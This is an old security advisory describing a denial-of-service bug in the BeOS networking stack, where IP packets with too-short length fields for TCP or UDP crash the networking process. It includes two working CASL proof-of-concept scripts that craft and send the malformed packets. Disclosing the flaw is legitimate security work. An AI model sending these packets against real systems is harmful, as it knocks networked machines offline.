The BeOS networking stack crashes when certain malformed packets are sent to it. This document explains two such packets and includes CASL scripts for packet generation.
d267418dd2b86fdb9dab0a8c84aa6d92238e386e740362ea438da2dfde622def
Problem:
It is possible to crash the BeOS networking process.
Discussion:
The BeOS networking stack crashes when certain malformed packets
are sent to it. This document explains two such packets. The
first is an IP packet with the protocol field set to TCP. If the
IP length field is set to be shorter than 40, it will crash the
networking process on reception. Similarly, an IP packet with
protocol field set to UDP with an IP length of less than 28 also
crashes the stack. The lengths 40 and 28 correspond with the
minimum sizes of the IP and TCP headers, and the IP and UDP headers
respectively.
Because the networking stack is a seperate process in BeOS, it may
be easily restarted after it crashes.
A bug report has been filed with Be and assigned the bug number of
20000405-18674. Be has marked the bug as "Will Not Fix" with the
comment "The entire networking system will be replaced soon."
This bug was found with the help of the ISIC utility by Mike Frantzen.
Two CASL scripts which demonstrate the bug are listed below.
References:
http://www.be.com/ - Be's website. BeOS is available for download
free of charge.
http://bebugs.be.com/devbugs/ - Be's bug tracking database.
http://expert.cc.purdue.edu/~frantzen/ - The homepage of the
ISIC author.
ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting
language CASL is available for download free of charge.
Script 1:
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;
packet = [ IPH ];
ip_output(packet);
Script 2:
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet = [ IPH ];
ip_output(packet);